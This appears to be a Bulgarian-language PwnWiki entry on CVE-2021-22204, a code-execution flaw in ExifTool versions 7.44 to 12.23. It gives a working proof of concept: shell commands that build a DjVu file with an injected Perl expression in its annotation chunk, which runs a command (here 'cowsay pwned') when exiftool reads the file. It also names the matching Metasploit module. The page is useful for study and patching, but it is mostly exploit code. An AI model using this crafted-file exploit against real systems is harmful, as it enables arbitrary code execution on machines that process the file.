CVE-2021-22204 ExifTool уязвимост при произволно изпълнение на код

From PwnWiki
This page is a translated version of the page CVE-2021-22204 ExifTool任意代碼執行漏洞 and the translation is 100% complete.
Other languages:
Afrikaans • ‎Bahasa Indonesia • ‎Bahasa Melayu • ‎Chinese • ‎Deutsch • ‎English • ‎Frysk • ‎Gaeilge • ‎Hausa • ‎Kinyarwanda • ‎Kreyòl ayisyen • ‎Lëtzebuergesch • ‎Malagasy • ‎Nederlands • ‎Tiếng Việt • ‎Türkçe • ‎azərbaycanca • ‎bosanski • ‎català • ‎corsu • ‎dansk • ‎eesti • ‎español • ‎euskara • ‎français • ‎galego • ‎hrvatski • ‎italiano • ‎latviešu • ‎lietuvių • ‎magyar • ‎polski • ‎português • ‎română • ‎shqip • ‎suomi • ‎svenska • ‎íslenska • ‎čeština • ‎Ελληνικά • ‎Кыргызча • ‎беларуская • ‎български • ‎монгол • ‎русский • ‎татарча • ‎тоҷикӣ • ‎українська • ‎қазақша • ‎հայերեն • ‎עברית • ‎العربية • ‎فارسی • ‎پښتو • ‎کوردی • ‎বাংলা • ‎ਪੰਜਾਬੀ • ‎ગુજરાતી • ‎ଓଡ଼ିଆ • ‎ಕನ್ನಡ • ‎မြန်မာဘာသာ • ‎ქართული • ‎አማርኛ • ‎ភាសាខ្មែរ • ‎中文(繁體)‎ • ‎日本語 • ‎한국어

Засегната версия

ExifTool 7.44 to 12.23


POC

  $ printf 'P1 1 1 0' > moo.pbm
   $ cjb2 moo.pbm moo.djvu
   $ printf 'ANTa\0\0\0\40"(xmp(\\\n".qx(cowsay pwned>&2);#"' >> moo.djvu
   $ exiftool moo.djvu > /dev/null
    _______
   < pwned >
    -------
           \   ^__^
            \  (oo)\_______
               (__)\       )\/\
                   ||----w |
                   ||     ||

-- 
Jakub Wilk

Metasploit

https://github.com/rapid7/metasploit-framework/pull/15185 

exploit/unix/fileformat/exiftool_djvu_ant_perl_injection
Retrieved from "https://pwnwiki.com/index.php?title=CVE-2021-22204_ExifTool任意代碼執行漏洞/bg&oldid=3207"